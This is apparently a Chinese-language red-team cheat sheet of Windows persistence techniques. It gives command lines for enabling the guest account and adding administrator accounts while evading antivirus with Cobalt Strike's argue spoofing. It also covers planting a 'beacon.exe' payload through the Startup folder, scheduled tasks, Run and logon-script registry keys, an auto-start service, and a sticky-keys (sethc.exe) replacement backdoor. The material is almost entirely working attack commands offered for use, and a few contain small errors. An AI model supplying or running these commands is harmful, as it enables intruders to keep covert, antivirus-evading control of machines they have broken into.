小姿势

权限维持小姿势

Win绕过AV添加账号

• 开启来宾用户‘

  net user guest /active:yes
  net user localgroup “Remote Desktop User” guest /add

• 由于无法直接添加管理员组，所以为了远程连接，添加到远程连接组（CS的argue命令参数污染）

  argue net1 xxxxx
  execute net1 user test /add
  execute net1 localgroup administrators test /add

• 添加优先级高于AV的启动项

  C:/windows/system32/cmd.exe /c net user test /add;net localgroup administrators test /add

自启动目录

copy "C:\beacon.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\beacon.exe" /y

这目录里面的东西都会在开机登录入系统后启动。（开机自启动）

定时任务

schtasks /create /tn demo /tr "c:\beacon.exe" /sc minute /mo 1  #创建一个名为demo的任务，任务内容为每分钟执行一次C盘根目录下的beacon.exe
schtasks /delete /tn WindowsUpdate  #删除名为demo的任务
#schtasks可以周期运行，重复检索任务是否处于运行状态，如果任务已经在执行不会重复执行。PS:schtasks可以深度定制。

shift后门

takeown /f C:\windows\system32\sethc.* /a /r /d y&&cacls C:\windows\system32\sethc.exe /T /E /G system:F&&copy "C:\beacon.exe" C:\windows\system32\sethc.exe /y

把粘滞键的启动程序改为后门程序。 要求能进入windows锁屏界面，且未关闭shift启动粘滞键，比如可以3389连过去或者能直接接触到。

注册表

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "C:\beacon.exe" /f

reg add HKEY_CURRENT_USER\Environment\UserInitMprLogonScript /t REG_EXPAND_SZ /d C:\beacon.exe

第二条启动先于杀软，注册表自启动路径很多，记几种常用的即可（开机自启动）

创建服务

sc create "demo" binpath= "C:\beacon.exe"
sc config "demo" start= auto

创建一个名为demo的自启动服务，服务路径为C:\beacon.exe（开机自启动）